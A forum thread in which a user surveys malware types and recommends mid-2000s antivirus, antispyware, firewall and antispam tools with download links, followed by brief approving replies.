[Malware] - your experience

[Diales]

Do we have an expert who can tell us more about malware?
I'm not Please correct me if something is wrong.

Malware (Malcious Software) consists of:
- Virus (Blended Attacks Exploits, Vulnerabilities, Buffer-Overflow ...)
- Worms (Denial of Service Attack [DOS], Spamserver-Host ...)
- Trojan Horses
- Dialer
- Spyware
- Adware
- Keylogger
- Software bugs
- Hijacker
- Phishing
- E-mail Scams
- Logic-, ANSI bombs
- Instant Messaging: bombing, flooding, spamming, spoofing
- Joke Programs
- (Spy-, tracking cookies)
- Bugs

Not malicious software
- Hoaxes (fake warnings)
- Chain letters
- Spammails

There are already two topics in this forum about "the best virus scanner" or similar. Do you also care about the other malware or haven't you known that they exits or even believed that your virus scanner detects all kind of malware?

Question of the day: is one virus scanner enough to prevent us from malware? :)


How do I protect myself?

A) Brain 1.0
"Think before you click OK!"
And I don't use Internet Explorer (exception www.tweaknews.net), Outlook, Outlook Express.
Instead of them, I use for browsing "Mozilla Firefox 0.9.3 (Firebird)" - faster, more safely and efficiently than with any other browser with a lot of free add-ons.
Info, download English: http://www.mozilla.org/products/firefox/
Info, download German: http://www.firebird-browser.de/

and for e-mail "Pegasus Mail 3.21c"
Amazing software :) Powerful and good protection against vulnerabilities.
Info English, German: http://www.pmail.com/
Download English: ftp://pegasus.uni-mannheim.de/pegasus/winpmail/w32-421c.exe
Download German: ftp://pegasus.uni-mannheim.de/pegasus/winpmail/language/de/421/w32-421c-de1.exe


B) Protection against Virus, Worms, Trojan horses, Dialer, Keylogger
I'm using G-Data AntiVirenkit 2004 (commercial, soon 2005 version available) which consists of the two scan-engines:
- Kaspersky (a good scanner for all kind of compressed files [zip, tar.gz, ...]
- Bitdefender
Both engines works pretty well together, but this software slows down your computer. It's recommended to use a Pentium 4 at minimum. What a like about this software is that G-Data AntiVirenkit 2004 have strong heuristic search engines. That means, they recognise malicious code even they don't know the virus, worms yet (no signature available at the moment). By this way, you can avoid to be infected by malware, which was constructed by script kiddies (use 3rd party tools to create their virus, worms… - they don't write their own software).

Although your background scanner protects you from current virus it's recommended to scan your pc every month with the current virus signature. You never know if your background scanner failed in the past. I do this regularly. I've been using G-Data for two years. Until now, I have just found two virus on five computers, which the guard missed. But it was my mistake: I forgot to enable compressed files scanning. So, rescan your harddisk with the updated signature file and have a look how reliable your software was :).

Personal ranking of anti-virus programs (version 2005 soon available) for WinXP - just my opinion:
1. AntiVirenkit 2004 (Bitdefender, Kaspersky)
2. F-Secure Internet Security 2004
3. McAfee VirusScan 2004
4. Kaspersky Antivirus Personal 5.0 (single version)

I don't like the following software, because I found more than 3 viruses or Trojan Horses... after a manual scan with updated virus signatures in the past (maybe caused by bad heuristic scanner). In my opinion, there’s room for an improvement:
- Antivir (free edition)
- AVG (free edition)
- Command Anti-Virus
- eTrust AV (Iris,VET-Engine)
- Nod32
- Norman Virus Control
- Norton Anti-Virus 2003/2004
- Panda Anti-Virus Titanium 2004
- Sophos Anti-Virus

If you’re not keen on buying an anti-virus software. Check your PC with this freeware tool (download everytime the newest version): McAfee AVERT Stinger
“Stinger is a stand-alone utility used to detect and remove specific viruses. It is not a substitute for full anti-virus protection, but rather a tool to assist administrators and users when dealing with an infected system. Stinger utilizes next generation scan engine technology, including process scanning, digitally signed DAT files, and scan performance optimizations.”
Info: http://vil.nai.com/vil/stinger/
Download: http://download.nai.com/products/mcafee-avert/stinger.exe


C) 2nd protection against Trojan Horses, Dialer, Keylogger
Commercial:
1. Trojan Hunter 3.9 (background scanner)
2. TDS-3 (On-demand scanner - I have to start a scan manual. Version 4 – coming soon)
3. a2 squared 1.0 personal (background scanner - I use it as an on-demand scanner, otherwise my system works unstable. Version 2.0 – coming soon).
Freeware on-demand scanner available http://www.emsisoft.com/en/software/free/. I haven't known that it would make my PC unstable. That's why I bought the personal edition . Other commercial software: Tauscan, BoClean, The Cleaner. They haven't found infected files in the past (more than twice). Since then, I don't use them anymore.


D) Protection against Spyware, Adware
Freeware:
1. Spybot Search & Destroy 1.3
Info: http://www.safer-networking.org
Download: http://www.majorgeeks.com/download.php?det=2471

2. Lavasoft Ad-Aware Personal SE 1.3
Info: http://www.lavasoftusa.com/software/adaware/
Download: http://www.download.com/3000-2144-10045910.html?part=69274&subj=dlpage&tag=button

3. SpywareBlaster 3.2 + SpywareGuard 2.2
Info: http://www.javacoolsoftware.com/spywareblaster.html
Info: http://www.javacoolsoftware.com/spywareguard.html
Download: http://www.javacoolsoftware.com/sbdownload.html
Download: http://www.javacoolsoftware.com/sgdownload.html

Commercial:
Pestpatrol Home Users 4.x
Info: http://www.pestpatrol.com/Products/PestPatrolHE/

Other commercial software: I also tried Spysweeper 2.0, but I deinstalled it later because it made my pc unstable. I also dislike Adware Remover Gold, AntiSpion (Databecker), AntiSpy, AntiSpyware (Network Associates), Bazooka Spyware Scanner, BPS Spyware Remover, SpyHunter, SpyRemover, SpySubtract, Spyware Eliminator, TZ-Spy Ad-Remover, XoftSpy. But this is my personal opinion


E) Protection against Hijacker
1. CWShredder 1.59.1 (thanks Nathan!)
CWShredder is a small utility for removing CoolWebSearch (aka CoolWwwSearch, YouFindAll, White-Pages.ws and a dozen other names).
Info / download unofficial: http://www.softpedia.com/public/cat/10/17/10-17-150.shtml

2. HijackThis 1.97.7
HijackThis is a tool, that lists all installed browser add-on, buttons, startup items and allows you to inspect, and optionally remove selected items.
Info / download unofficial: http://www.spychecker.com/program/hijackthis.html
Info official: http://www.spywareinfo.com/%7Emerijn/downloads.html - webserver was down at the time


How about a software firewall? Some keywords: Intrusion Detection System, Stateful-Packet-Inspection, Portscan, DoS Attacks, MAC spoofing, IP spoofing, NetBios attacks, Hijacking, DLL-Injection.

Yes. I installed a Zyxel Hardware Firewall.

F) Protection against disallowed software-access to internet and rejecting of unwanted data packets
I made experience with the following freeware products: Kerio Personal Firewall, Outpost Personal Firewall, SecurePoint Personal Firewall, Sygate Personal Firewall, ZoneAlarm.

In my opinion "Sygate Personal Firewall" offers the best protection. It's a tool for experienced users. It offers quite a good packet filtering and log function. Zone Alarm is my second choice and good for beginners (you can choose a pre-set packet filtering for certain programs). Both software closed all ports and didn't answer to any portscans. You can set your own packet filtering rules. But Zone Alarm failed in two important points:
a) it doesn't block well-known spam- and dialer websites - all other firewalls did that.
b) it failed the Tooleaky test. This is a software (for testing firewall) which tries to send and receive information over the Internet Explorer. A good firewall should recognize that a 3rd party software abuse its rights. Firstly, I didn't believe that this works, because I read the opposite on different websites. But unfortunately it is true. That means, a Trojan Horse can send information over a program like Internet Explorer, which has the right to connect to the internet. I hope ZoneLabs will fix that soon. Otherwise ZoneAlarm is quite a good firewall for most needs. Easy to install and well explained.


Fight again Spam
"Spampal" (freeware): "SpamPal is a mail classification program that can help separate your spam from the mail you really want to read." A very powerful Anti-Spam software with a lot plugins. You can even use public blacklists like Spamhaus SBL+XBL, ORDB, Spamcop, SpamBag, NJABL, DSBL, SORBS, SPEWS ...

Info, Download - English and other languages http://www.spampal.org/

Finally, I’m not a native speaker - sorry for my English Anyway, thanks for your feedback.
_________________
Malware: http://www.tweaknews.net/forum/viewtopic.php?t=3395 | https://netfiles.uiuc.edu/ehowes/www/main-nf.htm

Benchmark Software: http://www.benchmarkhq.ru/english.html?/b_e.html

How to build your own computer: http://www.pcmech.com/byopc/

[Google]

[ToggleHead]

where do you get these wonderful toys.......=]
a cookie goes to who can name the movie this quote is from.....its an easy one


good post man....whas your source......? =]
_________________

[Ham_fisT]

BATMAN Gimee my COOKIE

Great post there...all the Malware links I could ever ask for
_________________
Yeah....... ok

[2old2care]

Isn't the object here in malware land NOT to get a "cookie".
_________________
.
Liquid-Cooled Q9450 and an EeePC
.

[Silicon Skum]

[Diales]

hehe, this time own source.
cookies? drink a cup of milk - cheers!
_________________
Malware: http://www.tweaknews.net/forum/viewtopic.php?t=3395 | https://netfiles.uiuc.edu/ehowes/www/main-nf.htm

Benchmark Software: http://www.benchmarkhq.ru/english.html?/b_e.html

How to build your own computer: http://www.pcmech.com/byopc/

[ToggleHead]

again...nice post......=]

both ham and ss are right....good job guys
_________________

[Josh]

great post....calling for stickyness :)
_________________
»4 RS«»1Ж «»1 DENE«»1 FREAKIN LAME OH«»1 MONEY MONEY«
(-)

[JayDubya]

Wow, this is very nice. You really do your research.
_________________
JayDubya aka JW Jay JD ^> ﺵ

[Josh]

[King Asgarnia]

second for stickyness. KILL THOSE MAL WARE!!! KILL AND QUARENTINE AND DELETE THEM ALL!!! AND THE MAKERS OF THEM!!! BUUUUUURRRRNNNNN!!